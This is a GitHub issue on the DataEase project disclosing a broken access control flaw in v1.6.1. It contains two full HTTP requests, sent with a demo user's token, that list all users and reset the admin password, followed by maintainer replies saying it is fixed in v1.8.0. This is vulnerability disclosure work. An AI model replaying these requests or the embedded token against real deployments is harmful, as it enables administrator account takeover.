Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security Issues[Bug] #1618

Closed
espduino opened this issue Jan 11, 2022 · 3 comments
Closed

Security Issues[Bug] #1618

espduino opened this issue Jan 11, 2022 · 3 comments
Assignees
Labels
优先级:计划 类型:bug Something isn't working

Comments

@espduino
Copy link

espduino commented Jan 11, 2022

DataEase 版本
v1.6.1

浏览器版本
Chrome 96.0.4664.110

Bug 描述
I found an Broken Access Control vulnerability
An authenticated user can access information about all users and change admin password

Bug 重现步骤(有截图更好)

  1. use demo login
  2. this api access information about all users
    ···
    POST /api/user/userGrid/1/10 HTTP/1.1
    Host: dataease.fit2cloud.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: application/json, text/plain, /
    Content-Type: application/json
    Accept-Language: zh-CN
    Accept-Encoding: gzip, deflate
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
    LINK-PWD-TOKEN: null
    Connection: close
    Referer: https://dataease.fit2cloud.com/
    Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
    Content-Length: 13

{"orders":[]}
···
image

  1. this api change admin password
    ···
    POST /api/user/adminUpdatePwd HTTP/1.1
    Host: dataease.fit2cloud.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: application/json, text/plain, /
    Content-Type: application/json
    Accept-Language: zh-CN
    Accept-Encoding: gzip, deflate
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
    LINK-PWD-TOKEN: null
    Connection: close
    Referer: https://dataease.fit2cloud.com/
    Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
    Content-Length: 36

{"userId":1,"newPassword":"SECtest"}
···
image
now you can use admin/SECtest login

image

@xuwei-fit2cloud
Copy link
Contributor

感谢反馈,确实是有这个问题,我们尽快处理一下

@BBchicken-9527
Copy link

感谢反馈,这个问题将会在下个大版本中修复

@xuwei-fit2cloud
Copy link
Contributor

v1.8.0 版本已修复,请关注新版本。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
优先级:计划 类型:bug Something isn't working
Projects
None yet
Development

No branches or pull requests

5 participants